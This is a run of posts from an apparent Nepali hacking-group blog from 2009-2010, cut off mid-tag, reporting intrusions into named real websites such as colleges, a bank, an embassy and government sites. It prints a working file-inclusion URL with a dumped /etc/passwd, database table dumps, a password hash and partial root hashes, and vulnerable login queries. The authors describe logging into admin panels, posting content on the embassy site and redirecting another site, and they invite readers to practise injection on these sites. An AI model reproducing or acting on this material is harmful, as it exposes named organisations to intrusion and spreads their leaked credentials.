<br /><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-165592978454406091?l=nepsecvulns.blogspot.com' alt='' /></div>Danepali Hackerhttp://www.blogger.com/profile/12866747289101958230noreply@blogger.com1tag:blogger.com,1999:blog-3339723251203762129.post-47695512080365094052010-04-25T19:11:00.000-07:002010-04-25T19:11:33.667-07:00LACM.EDU.NP [little angels college of management] File inclusion vulnerabilityI was checking the site of Little Angels College of Management when they were here in KU for the sports week. & in a while, I found it to be vulnerable to file inclusion vulnerability.<br />Vulnerable URL is:<br />http://lacm.edu.np/?lacm=[any_file_to_include]<br /><b><br /></b><br /><b>/etc/passwd</b>:<br /><br />root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash postfix:x:89:89::/var/spool/postfix:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin shiva:x:500:500::/home/shiva:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin admispconfig:x:501:501:Administrator ISPConfig:/home/admispconfig:/bin/bash<br /><br />And I also got the sql Db.. what the hell they are keeping database backup in the website root folder itself.<br />See you guys.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-4769551208036509405?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com2tag:blogger.com,1999:blog-3339723251203762129.post-45273984299417494952010-04-25T18:57:00.000-07:002010-04-25T18:57:25.293-07:00Ekantipur.com [Ekantipur -online news portal of Kantipur Daily] VulnerabilityMost of us know about Ekantipur.com, online news portal of kantipur daily newspaper. They recently came with new design and development & I was hoping to see securely coded website but I was still able to find some holes in the website. There is a SQL injection vuln in the site of kantipur daily which can be used to potentially dump the DB & then the admin panel can be compromised and possibly we can get shell in the site..<br />I hope they will soon fix it.. & if they want to get the information of the vulnerability, I would be happy to help them.<br />Database tables in the current DB:<br />» daily_updates<br />» ek_categories<br />» ek_gallary_comments<br />» ek_gallary_images<br />» ek_gallery_image_rating<br />» ek_news<br />» ek_news_comments<br />» ek_news_gallary<br />» ek_news_gallary_details<br />» ek_news_keywords<br />» ek_news_keywords_list<br />» ek_news_ratings<br />» ek_news_reporter_list<br />» ek_news_reporters<br />» ek_photo_features<br />» ek_photo_gallary<br />» ek_sub_categories<br />» ekn_categories<br />» ekn_gallary_comments<br />» ekn_gallary_images<br />» ekn_gallery_image_rating<br />» ekn_news<br />» ekn_news_comments<br />» ekn_news_gallary<br />» ekn_news_gallary_details<br />» ekn_news_keywords<br />» ekn_news_keywords_list<br />» ekn_news_ratings<br />» ekn_news_reporter_list<br />» ekn_news_reporters<br />» ekn_photo_features<br />» ekn_photo_gallary<br />» ekn_photo_gallary_details<br />» ekn_sub_categories<br />» exchange_rates<br />» horoscope<br />» horoscope_reading<br />» horroscope<br />» kan_categories<br />» kan_gallary_images<br />» kan_main_photo<br />» kan_news<br />» kan_news_author_list<br />» kan_news_comments<br />» kan_news_gallary<br />» kan_news_gallary_details<br />» kan_news_keywords<br />» kan_news_keywords_list<br />» kan_news_ratings<br />» kan_news_reporter_list<br />» kan_news_reporters<br />» kan_photo_features<br />» kan_photo_gallary<br />» kan_photo_gallary_details<br />» kan_sub_categories<br />» kq_categories<br />» kq_gallary_images<br />» kq_issue<br />» kq_main_photo<br />» kq_news<br />» kq_news_author_list<br />» kq_news_authors<br />» kq_news_comments<br />» kq_news_gallary<br />» kq_news_gallary_details<br />» kq_news_keywords<br />» kq_news_keywords_list<br />» kq_news_ratings<br />» kq_photo_features<br />» kq_photo_gallary<br />» kq_photo_gallary_details<br />» kq_sub_categories<br />» login_records<br />» models<br />» models_gallery_images<br />» nar_categories<br />» nar_gallary_images<br />» nar_issue<br />» nar_news<br />» nar_news_author_list<br />» nar_news_authors<br />» nar_news_comments<br />» nar_news_gallary<br />» nar_news_gallary_details<br />» nar_news_keywords<br />» nar_news_keywords_list<br />» nar_news_ratings<br />» nar_photo_features<br />» nar_photo_gallary<br />» nar_photo_gallary_details<br />» nar_sub_categories<br />» nep_categories<br />» nep_gallary_images<br />» nep_issue<br />» nep_news<br />» nep_news_author_list<br />» nep_news_authors<br />» nep_news_comments<br />» nep_news_gallary<br />» nep_news_gallary_details<br />» nep_news_keywords<br />» nep_news_keywords_list<br />» nep_news_ratings<br />» nep_photo_features<br />» nep_photo_gallary<br />» nep_sub_categories<br />» nepa_year<br />» nepse_chart<br />» news_agency<br />» news_keywords<br />» news_status<br />» news_types<br />» papers<br />» photo_gallary_details<br />» poll_option<br />» poll_ques<br />» privilege<br />» ratings<br />» sap_blow_up<br />» sap_categories<br />» sap_gallary_images<br />» sap_issue<br />» sap_news<br />» sap_news_author_list<br />» sap_news_authors<br />» sap_news_comments<br />» sap_news_gallary<br />» sap_news_gallary_details<br />» sap_news_keywords<br />» sap_news_keywords_list<br />» sap_news_ratings<br />» sap_photo_features<br />» sap_photo_gallary<br />» sap_photo_gallary_details<br />» sap_sub_categories<br />» stock_trading_companies<br />» tithi<br />» tkp_categories<br />» tkp_gallary_images<br />» tkp_main_photo<br />» tkp_news<br />» tkp_news_comments<br />» tkp_news_gallary<br />» tkp_news_gallary_details<br />» tkp_news_keywords<br />» tkp_news_keywords_list<br />» tkp_news_ratings<br />» tkp_news_reporter_list<br />» tkp_news_reporters<br />» tkp_photo_features<br />» tkp_photo_gallary<br />» tkp_photo_gallary_details<br />» tkp_sub_categories<br />» user_paper_privileges<br />» user_type_privileges<br />» user_types<br />» users<br />» video_categories<br />» videos<br />» weather_details<br />» weather_place<br />» wp_1_comments<br />» wp_1_links<br />» wp_1_options<br />» wp_1_postmeta<br />» wp_1_posts<br />» wp_1_term_relationships<br />» wp_1_term_taxonomy<br />» wp_1_terms<br />» wp_blog_versions<br />» wp_blogs<br />» wp_registration_log<br />» wp_signups<br />» wp_site<br />» wp_sitecategories<br />» wp_sitemeta<br />» wp_usermeta<br />» wp_users<br /><br />No other dumps made over here for the reason of security. Hope they will secure it.<br />Thank you.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-4527398429941749495?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com5tag:blogger.com,1999:blog-3339723251203762129.post-9110812291457343852010-04-25T18:50:00.000-07:002010-04-25T18:50:39.830-07:00NHNepal.com New Horizons Computer Learning Centers VulnerabilityNHNepal.com is the official site of New Horizons Computer Learning Centers in Nepal which is vulnerable to minor injection attack. This vulnerability was reported to us by someone and full credit goes to him/her for finding this.<br />They state: <br />With over 300 centers in 70 countries, New Horizons is the <strong>world’s largest independent IT training company</strong>. Over the past 25 years, New Horizons has delivered a full range of IT training and business skills training through innovative learning methods that have transformed businesses and helped over 25 million students reach their goals.<br /><br />Anyway, logged in admin panel screenshot from the hacker himself:<br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_RVRW0sa79Nw/S9TxP8AGuWI/AAAAAAAAADI/Qvbukz8pKm8/s1600/nhnepal+sql+injection.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/_RVRW0sa79Nw/S9TxP8AGuWI/AAAAAAAAADI/Qvbukz8pKm8/s320/nhnepal+sql+injection.JPG" /></a></div><br />Thanks.. Hope they soon secure it or otherwise they will become victim of another pwnage.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-911081229145734385?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com1tag:blogger.com,1999:blog-3339723251203762129.post-28828857366618779322010-04-12T13:12:00.000-07:002010-04-12T13:12:56.817-07:00Cybersansar vulnerability re-exposedOne of the most visited sites from Nepal, CyberSansar.com is vulnerable to lots of serious injections like SQLi and XSS but today here I'm going to post the SQL injection in the site. I hope they will try to fix the site after reading this post. No offense at all to them. Moreover, the MySQL version is greater than 5 so its easier for the attacker to steal the database information.<br /><pre id="line1">User: database => cybernepal3@localhost:cybernepal_3</pre><pre id="line1"></pre><pre id="line1">Tables:</pre><pre id="line1">album_detail<br />album_master<br />album_person_related<br />art_gallery<br />art_gallery_image<br />art_gallery_path<br />art_grp_tag_gal<br />art_tag_gallery<br />art_tag_photo<br />art_tags<br />article_person_related<br />author<br />bachelor_user_logon<br />bc_category_para<br />bc_final_person_profile<br />bc_person_profile<br />bc_photo_folder<br />bc_profile_list<br />bc_profile_para<br />contest_master<br />contest_question_detail<br />contest_question_master<br />cs_birthday_wish<br />discography<br />ethnicity_para<br />ev_gallery<br />ev_gallery_image<br />ev_gallery_path<br />ev_grp_tag_gal<br />ev_person_related<br />ev_tag_gallery<br />ev_tag_photo<br />ev_tags<br />event_master<br />event_para_person_related<br />event_type<br />gallery<br />gallery_image<br />gallery_path<br />group_list<br />grp_tag_gal<br />job<br />org_para<br />org_type<br />person_persontype<br />person_taghion<br />photographer<br />popular_models<br />pr_category_para<br />pr_gallery_image<br />pr_hion<br />pr_person_detail<br />pr_person_profile<br />pr_persontype<br />pr_persontype_para<br />pr_photos<br />pr_profile_list<br />pr_profile_para<br />pr_question_related<br />pr_subcategory_para<br />pr_users<br />profile<br />profile1<br />profile_persontype<br />register_users<br />section<br />song_genre_related<br />song_orginal_singer_related<br />song_person_related<br />srw_login<br />srw_news<br />tag<br />tag_article<br />tag_gallery<br />tag_list<br />tag_photo<br />tags<br />user_logon<br />users<br />users_artist<br />vdb_music_category<br />vdb_video_info<br />vdb_video_info_backup<br />video_feature_singer_related<br />video_genre_related<br />video_orginal_singer_related<br />video_person_related<br />wallpaper<br />wallpaper_gallery </pre><pre id="line1"></pre><pre id="line1">I'm lazy to dump each column's data lol. Anyway, its just the message to CS how insecure they are.</pre><pre id="line1">Hope they fix this soon.</pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-2882885736661877932?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com7tag:blogger.com,1999:blog-3339723251203762129.post-40875032528943158622010-03-14T06:40:00.000-07:002010-03-14T06:41:13.591-07:00NTC Great HackHi all of hackers out there.<br />Can some one tell what the fuck is happening with http://websms.ntc.net/cgi-sys/defaultwebpage.cgi this???<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-4087503252894315862?l=nepsecvulns.blogspot.com' alt='' /></div>Danepali Hackerhttp://www.blogger.com/profile/12866747289101958230noreply@blogger.com3tag:blogger.com,1999:blog-3339723251203762129.post-1776646161579314282010-03-13T08:14:00.000-08:002010-03-13T08:14:39.185-08:00SpiceNepal.com [mero mobile] VulnerabilityIts been a long time we haven't posted to this blog. Apparently, none of the members seem to be active these days including me. Maybe its because of lots of load works to do and other shits in our life. Anyway, this one is the disclosure of the security of spicenepal.com<br />I thought to publish it now because spicenepal.com or mero mobile has now turned to NCell already.<br /><br />This might not be true at present but it is the data when the attack was done.<br /><br />Host info:<br />Windows<br />Apache 2.2.12<br />PHP 5.3.0<br />MySQL version: 5.1.37<br /><br />root: *CD6F0D95CC06845F457474160829CA31EA28A***<br />eshori: *13CC2012857387DA417378DAE0D32DB4FC729***<br />Last 3 bits changed for security purpose..<br /><br />Tables:<br />PBXT_STATISTICS<br />bak_banner<br />bak_bannerclient<br />bak_bannertrack<br />bak_categories<br />bak_components<br />bak_contact_details<br />bak_content<br />bak_content_frontpage<br />bak_content_rating<br />bak_core_acl_aro<br />bak_core_acl_aro_groups<br />bak_core_acl_aro_map<br />bak_core_acl_aro_sections<br />bak_core_acl_groups_aro_map<br />bak_core_log_items<br />bak_core_log_searches<br />bak_groups<br />bak_menu<br />bak_menu_types<br />bak_messages<br />bak_messages_cfg<br />bak_migration_backlinks<br />bak_modules<br />bak_modules_menu<br />bak_newsfeeds<br />bak_plugins<br />bak_poll_data<br />bak_poll_date<br />bak_poll_menu<br />bak_polls<br />bak_prbt<br />bak_sections<br />bak_session<br />bak_stats_agents<br />bak_templates_menu<br />bak_users<br />bak_weblinks<br />jos_banner<br />jos_bannerclient<br />......... and much more. I was just too lazy to exploit it.<br />Anyway that was the disclosure of spicenepal.com. Have fun.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-177664616157931428?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com4tag:blogger.com,1999:blog-3339723251203762129.post-4737405673596763962010-01-04T08:04:00.000-08:002010-01-04T08:26:27.727-08:00Ministry of forests & soil conservation vulnerabilityAs usual, another government site is vulnerable to SQL injection and this time, it can be used to mass own the server. I don't know why these fucking guys do such a poor coding. I just don't know who's kid, me or these guys.<br />Anyway, the MySQL>5 allows me to take all DB details and entities in it. Also, the admin panel is vulnerable to login bypass due to lack of filtration of the data.<br />Below is the screenshot of the logged panel:<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_R7J4rokcecI/S0IWO7g26sI/AAAAAAAAAA0/g16-jCrSwOE/s1600-h/mofsc.gov.np.JPG"><img style="cursor: pointer; width: 320px; height: 194px;" src="http://2.bp.blogspot.com/_R7J4rokcecI/S0IWO7g26sI/AAAAAAAAAA0/g16-jCrSwOE/s320/mofsc.gov.np.JPG" alt="" id="BLOGGER_PHOTO_ID_5422921347056986818" border="0" /></a><br /><br /><br /><br />Thank you and hope they fix it...<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-473740567359676396?l=nepsecvulns.blogspot.com' alt='' /></div>learn3r aka cyb3r lordhttp://www.blogger.com/profile/08049135959513279608noreply@blogger.com2tag:blogger.com,1999:blog-3339723251203762129.post-46178015873412714832009-12-26T11:00:00.000-08:002009-12-26T11:00:19.134-08:00Nepal Bangladesh Bank SQLi vulnerabilityThe official website of Nepal Bangladesh Bank Limited www.nbbl.com.np suffers from Sql injection and hence can be compromised to get sensitive informations from it. Its 1 a.m midnight already here so I am lazy to post the dumps for now. If I happen to remember it next day, I shall post the dumps. For now, following are some information of the server:<br /><b>current database:</b> <strong>nbblcom_db </strong><br /><strong>user : </strong><strong>nbblcom_admin@localhost</strong><br /><strong>DB version: </strong><strong>4.1.22-standard </strong><br />I am being too lazy at this time to bruteforce for the tables. Guys do yourself if you want to dig the site more.<br /><strong>Thanks.</strong><strong> </strong><strong> </strong><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-4617801587341271483?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com6tag:blogger.com,1999:blog-3339723251203762129.post-56312349116843295862009-12-23T20:33:00.000-08:002009-12-23T20:50:07.730-08:00Neoteric Nepal SQL injection Vuln<div>Official website of Neoteric nepal suffers from sql injection vuln.<br />Some details:<br />ftp: <a href="ftp://ftp.neoteric.com.np/">ftp://ftp.neoteric.com.np/</a><br />ftp security: very secure<br />Vuln:SQL injection<br />Dump:<br />Table name: admin_user<br />id:pwd= not displayed for security<br />Scrnshot:</div><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 507px; DISPLAY: block; HEIGHT: 279px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5418660305503921778" border="0" alt="" src="http://1.bp.blogspot.com/_AJFPBbDsJ2M/SzLy1qwSJnI/AAAAAAAAAA4/_gSp4acLPCk/s320/scrn.jpg" /><br /><div></div><br /><div>Hope they secure it soon<br />Regards,</div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-5631234911684329586?l=nepsecvulns.blogspot.com' alt='' /></div>dARK_pHOENIXhttp://www.blogger.com/profile/11872711864906408375noreply@blogger.com1tag:blogger.com,1999:blog-3339723251203762129.post-28803864232131562832009-12-23T07:41:00.000-08:002009-12-23T07:41:44.406-08:00National Information Technology Center site vulnerabilityThe official website of National Information Technology Center suffers from SQL injection and hence, the login information and other data can be taken away from the database. The worse part is that by uploading shell, one could not only deface nitc.gov.np but also other sites hosted on the server to name few: nepalgov.gov.np, hlcit.gov.np<br /><br />Just amazed that the center has got so many computer engineers and they are vulnerable to such a simple hack. They need to learn the sense of security to build secure digitalized nepal. Also, what is the fucking point of putting the files in admin panel folder and letting users download from them. And guys, you need to learn to prevent index browsing (its so open) and also the usage of sessions in PHP...<br /><br />Screenshot:<br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /><a href="http://1.bp.blogspot.com/_RVRW0sa79Nw/SzI4lcDT3TI/AAAAAAAAAC0/bWhkz1w-h2U/s1600-h/nitc.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/_RVRW0sa79Nw/SzI4lcDT3TI/AAAAAAAAAC0/bWhkz1w-h2U/s320/nitc.jpg" /></a><br /></div><div class="separator" style="clear: both; text-align: left;">Thanks... and absolutely no offense to them. We just want the secure nepal.<br /></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-2880386423213156283?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com3tag:blogger.com,1999:blog-3339723251203762129.post-62582079599091382242009-12-21T18:29:00.000-08:002009-12-21T18:35:58.007-08:00Ketaketi.org(CLFN) SQL Injection vulnThe official website of CLFN (Ketaketi.org) suffers from sql injection attack in bsoftmore.php<br />A remote attacker can easily get over the site. (Not me actually, i didnt find the login page.) anyway i got the id and passes/ The id and passes are not shown for security here.<br />Some details:<br />Site:ketaketi.org<br />Vuln: SQL injection<br />Table name: user<br />Hope they fix it soon<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-6258207959909138224?l=nepsecvulns.blogspot.com' alt='' /></div>dARK_pHOENIXhttp://www.blogger.com/profile/11872711864906408375noreply@blogger.com0tag:blogger.com,1999:blog-3339723251203762129.post-42654222712185299092009-12-20T10:22:00.000-08:002009-12-20T10:22:10.325-08:00www.indianembassy.org.np SQLi vulnerabilitywww.indianembassy.org.np is the official website of Indian Embassy in Nepal and the site is vulnerable to common SQL injection vulnerability.<br />The site uses mysql version 4 so no information_schema. So I just did bruteforcing by coding small script in PHP to find the valid username/password combination but they are pretty guessable. I didn't think of defacing because it is an organization and defacing such organizations totally would be wrong thing but I posted a news in the site.<br />Below is the screenshot:<br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_RVRW0sa79Nw/Sy5qxMhZKVI/AAAAAAAAACk/gu9Q5drVspQ/s1600-h/indianembassy.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/_RVRW0sa79Nw/Sy5qxMhZKVI/AAAAAAAAACk/gu9Q5drVspQ/s320/indianembassy.jpg" /></a><br /></div><br /><br />Absolutely no offense to indian embassy. But we hope you will be securing yourself after this pwnage.<br />Regards<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-4265422271218529909?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com4tag:blogger.com,1999:blog-3339723251203762129.post-66921549811226109952009-12-19T18:00:00.000-08:002009-12-19T18:16:44.552-08:00CCRC (ccrc.edu.np) SQLi VulnerabilityA sql injection vuln exists in ccrc college's website.<br />Details:<br />URL: http://ccrc.edu.np<br />FTP: ftp.ccrc.edu.np<br />FTP status: Very Secure (9.5/10)<br />SQL injection: Yes(8.5/10, since all critical datas can be extracted)<br /><br />Dumps:<br />rajan:c647f23604314d5aa5bb53ad3def9303 <br /><br />Hope they fix it soon<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-6692154981122610995?l=nepsecvulns.blogspot.com' alt='' /></div>dARK_pHOENIXhttp://www.blogger.com/profile/11872711864906408375noreply@blogger.com0tag:blogger.com,1999:blog-3339723251203762129.post-90210124471799320742009-12-19T08:31:00.001-08:002009-12-19T08:34:01.787-08:00ccma.edu.np SQLi vulnerabilityNot much, but I thought to share it over here.<br />The official website of Chartered College of Management and Accounts, <a href="http://www.ccma.edu.np" target="_blank">www.ccma.edu.np</a> suffers from sql injection attack and hence can be used to extract critical data from the database. Check the site main page <a href="http://www.ccma.edu.np/main.php" target="_blank">ccma home</a> to see the vulnerability. I have made redirection to the nep sec blog.<br /><br />Thanks<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-9021012447179932074?l=nepsecvulns.blogspot.com' alt='' /></div>learn3r aka cyb3r lordhttp://www.blogger.com/profile/08049135959513279608noreply@blogger.com0tag:blogger.com,1999:blog-3339723251203762129.post-67540197238637428752009-12-17T18:30:00.000-08:002009-12-17T18:41:18.044-08:00Universal College(http://www.uc.edu.np) SQL injection Vuln<div>A sql Injection Vuln exists in Universal College's site. A remote attacker can easily get the pwd and login.</div><br /><div>Some details:</div><br /><div>Vuln Type: SQL injection</div><br /><div>FTP: <a href="ftp://ftp.uc.edu.np/">ftp://ftp.uc.edu.np/</a> (Proftpd 1.3.0 server//WL)</div><br /><div>VULN RATING: 6/10 (SQL INJECTION), 8/10 (OLD FTP SERVER. MANY EXPLOITS ARE OUT THERE)</div><br /><div>STATUS:Notified</div><br /><div>Some proofs:</div><br /><div>Table_names: login, user</div><br /><div>Dumps:</div><br /><div>Not_REVEALED for security</div><br /><div>Screenshot of Logged in cpanel:<img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 520px; DISPLAY: block; HEIGHT: 362px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5416400474126007330" border="0" alt="" src="http://2.bp.blogspot.com/_AJFPBbDsJ2M/SyrriK2JvCI/AAAAAAAAAAM/rUJYnJJoAxY/s320/scrnshot.jpg" /></div>Hope they fix it down :D<br /><div></div><br /><div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-6754019723863742875?l=nepsecvulns.blogspot.com' alt='' /></div>dARK_pHOENIXhttp://www.blogger.com/profile/11872711864906408375noreply@blogger.com2tag:blogger.com,1999:blog-3339723251203762129.post-15770093499532934082009-12-10T03:45:00.000-08:002009-12-10T03:45:44.351-08:00Internet Business Bureau Common SQL injection Vulnerability<span id="goog_1260445096014"></span><span id="goog_1260445096015"></span><a href="http://www.blogger.com/"></a>I checked the IBB's portfolio and the sites it develops uses the same script and it is vulnerable to SQL injection. Check my previous post for more on knowing this:<br /><a href="http://nepsecvulns.blogspot.com/2009/12/party-popper-wwwpartypoppercomnp-sqli.html">http://nepsecvulns.blogspot.com/2009/12/party-popper-wwwpartypoppercomnp-sqli.html</a><br /><br />The same mysql injection is valid but filtering takes so you need to bypass filters (not hard). I would recommend you to google for mysql injection cheatsheets and learn and practice hacking in these sites.<br /><br />Nepali Hackers Are Not Dead, They Are Underground and Might Be At Your Root<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-1577009349953293408?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com3tag:blogger.com,1999:blog-3339723251203762129.post-32886638397110979252009-12-10T03:24:00.000-08:002009-12-10T03:24:06.783-08:00Party Popper [www.partypopper.com.np] SQLi vulnerabilityThe site of Party Popper [www.partypopper.com.np] is vulnerable to SQL injection and various information can be stolen. The SQL filtering IDS are working to some extent but we can easily bypass such filters and I was able to do the same.<br />Anyway, this site has nothing much but still we think that such security flaws must be addressed so that nepali developers work on protecting from such vulnerabilities...<br />Some tables:<br />admin<br />content<br /><br />Screenshot of logged admin panel:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_RVRW0sa79Nw/SyDaBX0vCEI/AAAAAAAAACU/Mq0nMOqdV1o/s1600-h/partypopper.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/_RVRW0sa79Nw/SyDaBX0vCEI/AAAAAAAAACU/Mq0nMOqdV1o/s320/partypopper.jpg" /></a><br /></div><br />Thanks. Admins can find the article by me at my site <a href="http://www.sampctricks.blogspot.com/">http://www.sampctricks.blogspot.com</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-3288663839711097925?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com0tag:blogger.com,1999:blog-3339723251203762129.post-23195566307325817892009-12-10T02:34:00.000-08:002009-12-10T02:34:54.130-08:00Engineering express [www.engxpress.com.np] Multiple VulnerabilitiesThe online website of <b>The Engineering Express </b>http://www.engxpress.com.np is pretty insecure with multiple vulnerabilities. It suffers from SQLi and insecure file upload vulnerability. Anyway below are some dumps from the website:<br />Few tables:<br />register<br />signin<br /><br />Columns in signin table:<br />Username<br />Password<br /><br /><br />Fucking lots of SQLi... <br /><br /><br />Login process:<br /><br />$stmt=sprintf("SELECT * FROM login WHERE username='%s' AND password='%s'",$usr, $pwd);<br />$dblink=DBset() ;//Connect to the database...<br />$result = DBquery($stmt, $dblink) ;//Send Query<br />$totresult = mysql_num_rows($result);<br />$row = mysql_fetch_object($result);<br /><br />Page.php:<br />$stmt=sprintf("SELECT Content FROM page WHERE Id='%s'",$_GET['recordID']);<br />$dblink=DBset() ;//Connect to the database...<br /><br />Other scripts are also vulnerable but I am too lazy to post them, too.<br /><br />Screenshots:<br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_RVRW0sa79Nw/SyDNtNgzoQI/AAAAAAAAACM/l1RizPBMvmY/s1600-h/engxpress.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/_RVRW0sa79Nw/SyDNtNgzoQI/AAAAAAAAACM/l1RizPBMvmY/s320/engxpress.jpg" /></a><br /></div>Certainly no offense but you need to improve yourself...<br />Thanks!!!<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-2319556630732581789?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com1tag:blogger.com,1999:blog-3339723251203762129.post-68931441091566412702009-12-09T00:00:00.000-08:002009-12-09T00:00:21.303-08:00Mero IT (www.meroit.com) SQL injection vulnerabilityThis was referred to me by my friend in the college and on viewing the site, I found it was vulnerable to common SQLi. The scripts do not validate the GET variables and hence we can inject SQL queries through URL GET parameters.<br /><br />Some interesting tables:<br />admin<br />client<br />personal_client_details<br /><br />Anyway below is the screenshot of the hacked admin panel located at /admin<br /><br /><div class="separator" style="clear: both; text-align: center;"><a 